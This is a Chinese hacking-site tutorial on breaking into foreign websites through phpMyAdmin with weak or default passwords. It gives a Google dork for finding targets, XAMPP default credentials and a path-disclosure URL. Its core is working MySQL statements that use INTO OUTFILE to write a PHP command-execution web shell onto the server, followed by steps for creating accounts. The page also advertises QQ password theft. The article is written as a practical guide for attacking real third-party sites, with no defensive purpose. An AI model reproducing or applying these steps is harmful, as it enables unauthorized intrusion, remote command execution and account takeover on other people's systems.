您现在的位置: 主页 > 华夏黑客联盟 > 黑客攻击 > 文章内容

利用phpmyadmin弱口令入侵国外站

作者: QQ黑客 来源:未知 时间: 2013-10-20 阅读:

作者:QQ黑客

地址:本站 怎么盗QQ密码,破解QQ聊天记录

我们已知xampp下有mysql phpmyadmin ftp 等 都是功能强大程序
我们何不去利用呢?而且很多国外管理员都很懒很少 改密码!因此给了我们入侵的机会!
呵呵!列如xampp的默认密码,帐号newuser  密码:wampp
我们可以常识ftp登陆dos下传1.php文件来完成我们的入侵!
不过今天我们讲的是phpmyadmin 不离题额!黑客基地下次讲xampp的ftp默认帐号密码情况入侵
我也搞了动画出来了,下载地址:http://www.focusingchina.net/down/donghua/ftp.rar
打开google 搜索:phpmyadmin/index.php  大家可以更改其他关键词

呵呵,我就随便拿个phpmyadmin来演示吧!你们可以自己试搜索更多的关键词
我想很多 都是国外的 而且可以直接访问数据库的!如图

当然看到这个页面我们就想到 导出SHELL 需要得到系统路径怎么办呢?
其实很简单暴出phpmyadmin的绝对路径
漏洞地址:phpmyadmin/themes/darkblue_orange/layout.inc.php 如图黑客

呵呵,得到了 路径当然是去 建表导SHELL了,呵呵

MySQL命令建设小波并保存到本地路径X
Create TABLE `xiaobo` (`xiaobo` TEXT NOT NULL) TYPE = MYISAM;Insert INTO `xiaobo` ( `xiaobo` ) VALUES ('<?php $cmd = $_GET["cmd"];system($cmd);?>');
Select `xiaobo` FROM `xiaobo` INTO OUTFILE '这里写系统路径';Drop TABLE `xiaobo`;
然后把xiaobo 改成你们喜欢用的表吧!然后选择数据库在点SQL备分,如图

成功了,打开webshell 执行命令 如图

呵呵 成功建立了帐户,基于root给予我们狠强大的 权限!
在提醒 新手朋友们!一般国外的的系统都会把Administrators管理组 换成别的 我们可以用命令来查
管理员的管理组!呵呵,罗嗦一下 别骂我吖!by小波 欢迎大家常来我blog吹吹牛 俺会经常更新一些基础免费刷qb
教程给大家学习的!